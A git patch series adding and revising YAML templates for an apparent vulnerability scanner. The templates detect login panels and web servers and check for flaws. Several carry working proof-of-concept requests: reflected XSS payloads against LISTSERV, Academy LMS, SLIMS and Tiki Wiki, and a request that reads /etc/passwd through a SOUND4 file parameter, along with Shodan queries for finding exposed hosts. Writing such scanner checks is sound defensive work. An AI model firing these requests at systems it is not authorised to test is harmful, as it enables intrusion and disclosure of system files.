detection support for uvicorn --- technologies/tech-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index d8cd8d793c..9da708424e 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3675,3 +3675,9 @@ requests: part: header words: - "X-Powered-By: Sails" + + - type: word + name: uvicorn + part: header + words: + - "uvicorn" From 3001ac52a1aabc6f7c8596bb53588102a83a72f8 Mon Sep 17 00:00:00 2001 From: Fabian Affolter <mail@fabian-affolter.ch> Date: Sun, 22 Jan 2023 00:33:19 +0100 Subject: [PATCH 1071/1133] Support for detecting Connect Box devices --- exposed-panels/connect-box-login.yaml | 36 +++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposed-panels/connect-box-login.yaml diff --git a/exposed-panels/connect-box-login.yaml b/exposed-panels/connect-box-login.yaml new file mode 100644 index 0000000000..f761b3666c --- /dev/null +++ b/exposed-panels/connect-box-login.yaml @@ -0,0 +1,36 @@ +id: connect-box-login + +info: + name: Connect Box Login Panel - Detect + author: fabaff + severity: info + description: Connect Box login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: tech,panel,connectbox,iot + +requests: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "NET-DK/1.0" + + - type: word + part: header + words: + - "../common_page/login.html" + + - type: status + status: + - 302 From fc20b95c901870303697e74a839b76b65fd8d975 Mon Sep 17 00:00:00 2001 From: Fabian Affolter <mail@fabian-affolter.ch> Date: Sun, 22 Jan 2023 00:56:28 +0100 Subject: [PATCH 1072/1133] Add support to detect ESPHome --- exposed-panels/esphome-panel.yaml | 33 +++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/esphome-panel.yaml diff --git a/exposed-panels/esphome-panel.yaml b/exposed-panels/esphome-panel.yaml new file mode 100644 index 0000000000..846f98eb71 --- /dev/null +++ b/exposed-panels/esphome-panel.yaml @@ -0,0 +1,33 @@ +id: esphome-panel + +info: + name: ESPHome Panel - Detect + author: fabaff + severity: info + description: ESPHome panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: tech,panel,esphome,iot + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Dashboard - ESPHome" + + - type: word + part: body + words: + - "" + + - type: status + status: + - 200 From a0f5c6316ae9df729789e7253c93486605adc3f9 Mon Sep 17 00:00:00 2001 From: Fabian Affolter Date: Sun, 22 Jan 2023 01:03:22 +0100 Subject: [PATCH 1073/1133] Add support to detect Tornado --- technologies/tech-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index d8cd8d793c..11e76fbd7f 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3675,3 +3675,9 @@ requests: part: header words: - "X-Powered-By: Sails" + + - type: word + name: tornado + part: header + words: + - "TornadoServer/" From 9d6b931fbd9186e903b1cad57d1e5f9ae2706b25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 22 Jan 2023 04:02:02 +0000 Subject: [PATCH 1074/1133] Auto WordPress Plugins Update [Sun Jan 22 04:02:02 UTC 2023] :robot: --- helpers/wordpress/plugins/redirection.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/helpers/wordpress/plugins/redirection.txt b/helpers/wordpress/plugins/redirection.txt index 0722778658..2e0c25f79a 100644 --- a/helpers/wordpress/plugins/redirection.txt +++ b/helpers/wordpress/plugins/redirection.txt @@ -1 +1 @@ -5.3.6 \ No newline at end of file +5.3.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index d01c9f6604..5002120276 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.4 \ No newline at end of file +4.5.5 \ No newline at end of file From 606bd462f9aa1217b4620f741d79a9a4c9efe979 Mon Sep 17 00:00:00 2001 From: sergheusz Date: Sun, 22 Jan 2023 02:47:06 -0300 Subject: [PATCH 1075/1133] Added sqlbuddy-panel Template --- exposed-panels/sqlbuddy-panel.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/sqlbuddy-panel.yaml diff --git a/exposed-panels/sqlbuddy-panel.yaml b/exposed-panels/sqlbuddy-panel.yaml new file mode 100644 index 0000000000..f2f26c8816 --- /dev/null +++ b/exposed-panels/sqlbuddy-panel.yaml @@ -0,0 +1,30 @@ +id: sqlbuddy-panel + +info: + name: SQL Buddy Panel + author: nullfuzz + severity: info + description: | + SQL Buddy is a third-party tool that you can use to MySQL administration. + reference: + - http://sqlbuddy.com/ + metadata: + verified: true + shodan-query: http.html:"sqlbuddy" || http.title:"SQL Buddy" + tags: panel,sqlbuddy + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/sqlbuddy/" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'SQL Buddy')" + condition: and \ No newline at end of file From 04f20f87c527e34eaceacfa6e3839682f2d704fd Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Sun, 22 Jan 2023 23:20:06 +0530 Subject: [PATCH 1078/1133] Create CVE-2022-39195.yaml --- cves/2022/CVE-2022-39195.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2022/CVE-2022-39195.yaml diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml new file mode 100644 index 0000000000..abe3c73e4d --- /dev/null +++ b/cves/2022/CVE-2022-39195.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-39195 + +info: + name: LISTSERV v17 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + LISTSERV version 17 suffers from a cross site scripting vulnerability + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39195 + - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html + metadata: + shodan-query: http.html:"LISTSERV" + verified: "true" + tags: xss,cve,2022 + +requests: + - raw: + - | + GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + - | + GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "<script>alert(1)</script>" From 6984c50ff2c92d28082697a11583a2bb64f851ca Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Sun, 22 Jan 2023 23:34:44 +0530 Subject: [PATCH 1079/1133] Create CVE-2019-15501 --- cves/2019/CVE-2019-15501 | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2019/CVE-2019-15501 diff --git a/cves/2019/CVE-2019-15501 b/cves/2019/CVE-2019-15501 new file mode 100644 index 0000000000..faccbd5b00 --- /dev/null +++ b/cves/2019/CVE-2019-15501 @@ -0,0 +1,31 @@ +id: CVE-2019-15501 + +info: + name: LISTSERV v17 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + LISTSERV version 17 suffers from a cross site scripting vulnerability + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 + - https://packetstormsecurity.com/files/154202/LSoft-ListServ-Cross-Site-Scripting.html + metadata: + shodan-query: http.html:"LISTSERV" + verified: "true" + tags: xss,cve,2019 + +requests: + - raw: + - | + GET /scripts/wa.exe?OK=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "<script>alert(1)</script>" From ea6e61448dbdd20671daa12c336f9144e2cce92b Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Mon, 23 Jan 2023 00:02:57 +0530 Subject: [PATCH 1080/1133] Create alms-xss --- vulnerabilities/other/alms-xss | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/alms-xss diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/alms-xss new file mode 100644 index 0000000000..4179e6a857 --- /dev/null +++ b/vulnerabilities/other/alms-xss @@ -0,0 +1,32 @@ +id: alm + +info: + name: Academy Learning Management System v5.1.1 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter. + reference: + - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html + metadata: + shodan-query: http.html:"Academy LMS" + verified: "true" + tags: xss,lms + +requests: + - raw: + - | + GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '<script>alert(document.domain)</script>' From 7480a835291a489b133ff29c9d0b9ff02eeacea2 Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Mon, 23 Jan 2023 00:30:48 +0530 Subject: [PATCH 1081/1133] Create slims-xss.yaml --- vulnerabilities/other/slims-xss.yaml | 30 ++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/slims-xss.yaml diff --git a/vulnerabilities/other/slims-xss.yaml b/vulnerabilities/other/slims-xss.yaml new file mode 100644 index 0000000000..9a73a9d2c3 --- /dev/null +++ b/vulnerabilities/other/slims-xss.yaml @@ -0,0 +1,30 @@ +id: slims-xss + +info: + name: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 - Access Control + author: arafatansari + severity: medium + description: | + SLIMS 9 was discovered to contain `destination` request parameter that copies the value of an HTML tag attribute which is encapsulated in double quotation marks. + reference: + - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html + metadata: + shodan-query: http.html:"SLIMS" + verified: "true" + tags: xss,slims + +requests: + - raw: + - | + GET /index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(1)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '<script>alert(1)</script>' From 86c69575b3eaac1718eea146012808f207563b92 Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Mon, 23 Jan 2023 00:58:22 +0530 Subject: [PATCH 1082/1133] Create tikiwiki-xss.yaml --- vulnerabilities/other/tikiwiki-xss.yaml | 33 +++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/other/tikiwiki-xss.yaml diff --git a/vulnerabilities/other/tikiwiki-xss.yaml b/vulnerabilities/other/tikiwiki-xss.yaml new file mode 100644 index 0000000000..2475d79a1f --- /dev/null +++ b/vulnerabilities/other/tikiwiki-xss.yaml @@ -0,0 +1,33 @@ +id: tikiwiki-xss + +info: + name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Tiki Wiki CMS was discovered to contain a cross site scripting via objectId parameter which can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html + metadata: + shodan-query: http.html:"tiki wiki" + verified: "true" + tags: xss,tiki,wiki,cms + +requests: + - raw: + - | + GET /tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(1)</script> HTTP/1.1 + Host: {{Hostname}} + + - | + GET /tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(1)</script> HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 403 + + - type: word + words: + - '<script>alert(1)</script>' From e0c253202e6086cde88ce6fde8415f86cd684d45 Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Mon, 23 Jan 2023 01:54:11 +0530 Subject: [PATCH 1083/1133] Create sound4-disclosure.yaml --- vulnerabilities/other/sound4-disclosure.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/other/sound4-disclosure.yaml diff --git a/vulnerabilities/other/sound4-disclosure.yaml b/vulnerabilities/other/sound4-disclosure.yaml new file mode 100644 index 0000000000..597dc0db37 --- /dev/null +++ b/vulnerabilities/other/sound4-disclosure.yaml @@ -0,0 +1,29 @@ +id: sound4-disclosure + +info: + name: SOUND4 FIRST - File Disclosure + author: arafatansari + severity: medium + reference: + - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html + description: | + SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure + metadata: + shodan-query: http.html:"SOUND4" + verified: true + tags: command,injected,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 332572eb223089ae67fe3f4cedaf530ca7719246 Mon Sep 17 00:00:00 2001 From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com> Date: Mon, 23 Jan 2023 01:54:55 +0530 Subject: [PATCH 1084/1133] Create sound4-disclosure2.yaml --- vulnerabilities/other/sound4-disclosure2.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/other/sound4-disclosure2.yaml diff --git a/vulnerabilities/other/sound4-disclosure2.yaml b/vulnerabilities/other/sound4-disclosure2.yaml new file mode 100644 index 0000000000..52ccbfc2e1 --- /dev/null +++ b/vulnerabilities/other/sound4-disclosure2.yaml @@ -0,0 +1,31 @@ +id: sound4-disclosure2 + +info: + name: SOUND4 FIRST - Information Disclosure + author: arafatansari + severity: medium + reference: + - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html + description: | + SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure + metadata: + shodan-query: http.html:"SOUND4" + verified: true + tags: information,disclosure,unauthenticated + +requests: + - raw: + - | + GET /log/ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "<title>Index of /log" + - "Parent Directory" + + - type: status + status: + - 200 From c830f8a21158323c34bbb4df41da7e936c9a02de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 04:02:30 +0000 Subject: [PATCH 1085/1133] Auto WordPress Plugins Update [Mon Jan 23 04:02:30 UTC 2023] :robot: --- helpers/wordpress/plugins/redirection.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/redirection.txt b/helpers/wordpress/plugins/redirection.txt index 2e0c25f79a..d758bc62f6 100644 --- a/helpers/wordpress/plugins/redirection.txt +++ b/helpers/wordpress/plugins/redirection.txt @@ -1 +1 @@ -5.3.7 \ No newline at end of file +5.3.8 \ No newline at end of file From ed200ecad8c38c91c7fa50d21d9e87ccf6924d7c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 09:52:06 +0530 Subject: [PATCH 1086/1133] fixed-formatting --- ...-disclosure.yaml => sound4-file-disclosure.yaml} | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) rename vulnerabilities/other/{sound4-disclosure.yaml => sound4-file-disclosure.yaml} (53%) diff --git a/vulnerabilities/other/sound4-disclosure.yaml b/vulnerabilities/other/sound4-file-disclosure.yaml similarity index 53% rename from vulnerabilities/other/sound4-disclosure.yaml rename to vulnerabilities/other/sound4-file-disclosure.yaml index 597dc0db37..4f3eb559d2 100644 --- a/vulnerabilities/other/sound4-disclosure.yaml +++ b/vulnerabilities/other/sound4-file-disclosure.yaml @@ -1,17 +1,18 @@ -id: sound4-disclosure +id: sound4-file-disclosure info: - name: SOUND4 FIRST - File Disclosure + name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure author: arafatansari severity: medium + description: | + The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html - description: | - SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php metadata: shodan-query: http.html:"SOUND4" - verified: true - tags: command,injected,unauthenticated + verified: "true" + tags: lfi,sound4,unauth,disclosure requests: - method: GET From 3f726c64add296a18700c08b9afeba4d8616cf92 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 04:26:35 +0000 Subject: [PATCH 1087/1133] Auto Generated New Template Addition List [Mon Jan 23 04:26:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 644e83f1ee..c3eb8f0628 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ cves/2022/CVE-2022-1168.yaml +vulnerabilities/other/sound4-file-disclosure.yaml From e39f508e5172b8dea3d86b24be6551dea502e698 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 10:20:26 +0530 Subject: [PATCH 1088/1133] fix-matcher --- vulnerabilities/other/tikiwiki-xss.yaml | 28 ++++++++++++------------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/vulnerabilities/other/tikiwiki-xss.yaml b/vulnerabilities/other/tikiwiki-xss.yaml index 2475d79a1f..d05f16d75d 100644 --- a/vulnerabilities/other/tikiwiki-xss.yaml +++ b/vulnerabilities/other/tikiwiki-xss.yaml @@ -5,29 +5,29 @@ info: author: arafatansari severity: medium description: | - Tiki Wiki CMS was discovered to contain a cross site scripting via objectId parameter which can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability. + reference: - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html metadata: shodan-query: http.html:"tiki wiki" verified: "true" - tags: xss,tiki,wiki,cms + tags: acketstorm,edb,xss,tikiwiki requests: - - raw: - - | - GET /tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId= HTTP/1.1 - Host: {{Hostname}} - - - | - GET /tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId= HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=" + - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=" matchers-condition: and matchers: + - type: word + part: body + words: + - '' + - 'Tiki Wiki CMS' + condition: and + - type: status status: - 403 - - - type: word - words: - - '' From 74b188e8e0548ba05dc678ca529914db56b03b16 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 10:21:13 +0530 Subject: [PATCH 1089/1133] added-stop-first-match --- vulnerabilities/other/tikiwiki-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/tikiwiki-xss.yaml b/vulnerabilities/other/tikiwiki-xss.yaml index d05f16d75d..7f1632d6fd 100644 --- a/vulnerabilities/other/tikiwiki-xss.yaml +++ b/vulnerabilities/other/tikiwiki-xss.yaml @@ -19,6 +19,7 @@ requests: - "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=" - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 0d2ef3a6c2cb863a3adddec552fbe7c38c440527 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 10:33:27 +0530 Subject: [PATCH 1090/1133] fixed-template --- vulnerabilities/other/sound4-disclosure2.yaml | 31 ------------------ .../sound4-directory-listing.yaml | 32 +++++++++++++++++++ 2 files changed, 32 insertions(+), 31 deletions(-) delete mode 100644 vulnerabilities/other/sound4-disclosure2.yaml create mode 100644 ‎‎misconfiguration/sound4-directory-listing.yaml diff --git a/vulnerabilities/other/sound4-disclosure2.yaml b/vulnerabilities/other/sound4-disclosure2.yaml deleted file mode 100644 index 52ccbfc2e1..0000000000 --- a/vulnerabilities/other/sound4-disclosure2.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: sound4-disclosure2 - -info: - name: SOUND4 FIRST - Information Disclosure - author: arafatansari - severity: medium - reference: - - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html - description: | - SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure - metadata: - shodan-query: http.html:"SOUND4" - verified: true - tags: information,disclosure,unauthenticated - -requests: - - raw: - - | - GET /log/ HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - words: - - "Index of /log" - - "Parent Directory" - - - type: status - status: - - 200 diff --git a/‎‎misconfiguration/sound4-directory-listing.yaml b/‎‎misconfiguration/sound4-directory-listing.yaml new file mode 100644 index 0000000000..d54b214901 --- /dev/null +++ b/‎‎misconfiguration/sound4-directory-listing.yaml @@ -0,0 +1,32 @@ +id: sound4-directory-listing + +info: + name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure + author: arafatansari + severity: medium + description: | + The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information. + reference: + - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php + metadata: + shodan-query: http.html:"SOUND4" + verified: true + tags: listing,sound4,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/log/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of /log" + - "Parent Directory" + condition: and + + - type: status + status: + - 200 From 243b12571c3cea880584d3d5ffdebd5c58f037a3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 10:57:54 +0530 Subject: [PATCH 1091/1133] matcher-update added additional data to keep the template uniform --- .../other/{alms-xss => academy-lms-xss.yaml} | 29 ++++++++++--------- 1 file changed, 15 insertions(+), 14 deletions(-) rename vulnerabilities/other/{alms-xss => academy-lms-xss.yaml} (61%) diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/academy-lms-xss.yaml similarity index 61% rename from vulnerabilities/other/alms-xss rename to vulnerabilities/other/academy-lms-xss.yaml index 4179e6a857..65a7a563f8 100644 --- a/vulnerabilities/other/alms-xss +++ b/vulnerabilities/other/academy-lms-xss.yaml @@ -1,32 +1,33 @@ -id: alm +id: academy-lms-xss info: - name: Academy Learning Management System v5.1.1 - Cross-Site Scripting + name: Academy LMS 5.11 Cross Site Scripting author: arafatansari severity: medium description: | Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter. reference: - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html - metadata: + - https://vulners.com/packetstorm/PACKETSTORM:170514 + metadata: shodan-query: http.html:"Academy LMS" verified: "true" - tags: xss,lms + tags: xss,lms,academy requests: - - raw: - - | - GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - + - method: GET + path: + - "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word + - type: word part: body words: - '' + - 'Academy LMS' + condition: and + + - type: status + status: + - 200 From d50f1137a1c41f5328b88bebe8e69c18c85c450f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 11:06:13 +0530 Subject: [PATCH 1092/1133] updated name --- ‎‎misconfiguration/sound4-directory-listing.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/‎‎misconfiguration/sound4-directory-listing.yaml b/‎‎misconfiguration/sound4-directory-listing.yaml index d54b214901..cdb8441a09 100644 --- a/‎‎misconfiguration/sound4-directory-listing.yaml +++ b/‎‎misconfiguration/sound4-directory-listing.yaml @@ -1,7 +1,7 @@ id: sound4-directory-listing info: - name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure + name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure author: arafatansari severity: medium description: | @@ -10,9 +10,9 @@ info: - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php metadata: - shodan-query: http.html:"SOUND4" verified: true - tags: listing,sound4,misconfig + shodan-query: http.html:"SOUND4" + tags: misconfig,listing,sound4,disclosure requests: - method: GET From 97c0d133365e7bb60336e94b40c4504105053d3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 11:13:38 +0530 Subject: [PATCH 1093/1133] fixed-template --- cves/2019/CVE-2019-15501 | 25 ++++++++++++++----------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/cves/2019/CVE-2019-15501 b/cves/2019/CVE-2019-15501 index faccbd5b00..8fd7687bc7 100644 --- a/cves/2019/CVE-2019-15501 +++ b/cves/2019/CVE-2019-15501 @@ -1,31 +1,34 @@ id: CVE-2019-15501 info: - name: LISTSERV v17 - Cross Site Scripting + name: LSoft ListServ < 16.5-2018a - Cross-Site Scripting author: arafatansari severity: medium description: | - LISTSERV version 17 suffers from a cross site scripting vulnerability + Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 - https://packetstormsecurity.com/files/154202/LSoft-ListServ-Cross-Site-Scripting.html + - https://www.exploit-db.com/exploits/47302 + - https://www.tenable.com/cve/CVE-2019-15501 metadata: shodan-query: http.html:"LISTSERV" verified: "true" - tags: xss,cve,2019 + tags: cve,cve2019,xss,listserv requests: - - raw: - - | - GET /scripts/wa.exe?OK=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/scripts/wa.exe?OK=%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: + - type: word + words: + - "" + - "LISTSERV" + condition: and + - type: status status: - 200 - - - type: word - words: - - "" From 6ebeb17cb27e04e36355e0ed112a8de4e5fd2ed4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 11:18:05 +0530 Subject: [PATCH 1094/1133] updated matchers,tags,added classification --- cves/2022/CVE-2022-39195.yaml | 37 +++++++++++++++++++++-------------- 1 file changed, 22 insertions(+), 15 deletions(-) diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml index abe3c73e4d..32e557875e 100644 --- a/cves/2022/CVE-2022-39195.yaml +++ b/cves/2022/CVE-2022-39195.yaml @@ -7,29 +7,36 @@ info: description: | LISTSERV version 17 suffers from a cross site scripting vulnerability reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39195 - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-39195 + classification: + cve-id: CVE-2022-39195 metadata: - shodan-query: http.html:"LISTSERV" verified: "true" - tags: xss,cve,2022 + shodan-query: http.html:"LISTSERV" + tags: cve,cve2022,xss,listserv requests: - - raw: - - | - GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" + - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" + stop-at-first-match: true matchers-condition: and 